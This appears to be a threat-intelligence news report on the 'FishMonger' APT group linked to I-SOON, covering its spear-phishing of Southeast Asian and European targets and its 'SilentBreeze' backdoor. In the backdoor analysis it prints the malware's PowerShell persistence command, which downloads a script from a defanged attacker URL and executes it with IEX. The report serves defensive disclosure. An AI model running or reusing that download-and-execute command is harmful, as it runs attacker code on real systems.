Recent cybersecurity investigations have uncovered a sophisticated threat actor dubbed “FishMonger” operating under the umbrella of I-SOON, a Chinese company with alleged ties to state-sponsored hacking operations.
This Advanced Persistent Threat (APT) group has been systematically targeting government institutions and non-governmental organizations across Southeast Asia and parts of Europe since at least 2021.
The attacks show a high level of sophistication, with carefully crafted phishing campaigns and custom malware designed to exfiltrate sensitive diplomatic and policy-related information from targeted organizations.
.png
)
Initial analysis suggests FishMonger’s operations align with Chinese strategic interests, particularly focusing on entities involved in South China Sea territorial disputes and international human rights advocacy groups monitoring activities in the region.
The group maintains persistent access to compromised networks for extended periods, often remaining undetected for months while harvesting credentials and sensitive documents.
ESET researchers identified distinctive patterns in FishMonger’s attack chain, including the use of template injection in Microsoft Office documents and a custom backdoor called “SilentBreeze” that establishes command and control connections through encrypted channels.
This APT employs sophisticated counter-detection techniques, regularly modifying their toolset to evade security solutions.
The initial infection typically begins with spear-phishing emails containing malicious documents tailored to the victim organization.
When opened, these documents exploit vulnerabilities or use social engineering to execute a multi-stage infection process.
.webp)
The phishing email targeting a Southeast Asian diplomatic mission with a document purporting to contain regional security briefing information.
Analysis of SilentBreeze Backdoor
The SilentBreeze backdoor utilizes a complex encryption algorithm to obscure its command and control traffic.
Upon execution, it creates persistence through a scheduled task that executes the following PowerShell command:-
$wc = New-Object System.Net.WebClient;
$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36");
$wc.DownloadString("hxxps://cdn-storage[.]cloud-service[.]site/updates.php") | IEXThis command downloads and executes additional payloads from the attacker’s infrastructure.
.webp)
The malware then establishes communication with command servers, which displays the network traffic pattern distinctive to SilentBreeze infections.
The group’s infrastructure relies heavily on compromised third-party websites serving as proxies to mask the true command servers, making attribution and takedown efforts particularly challenging for defending organizations and cybersecurity researchers tracking their activities.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
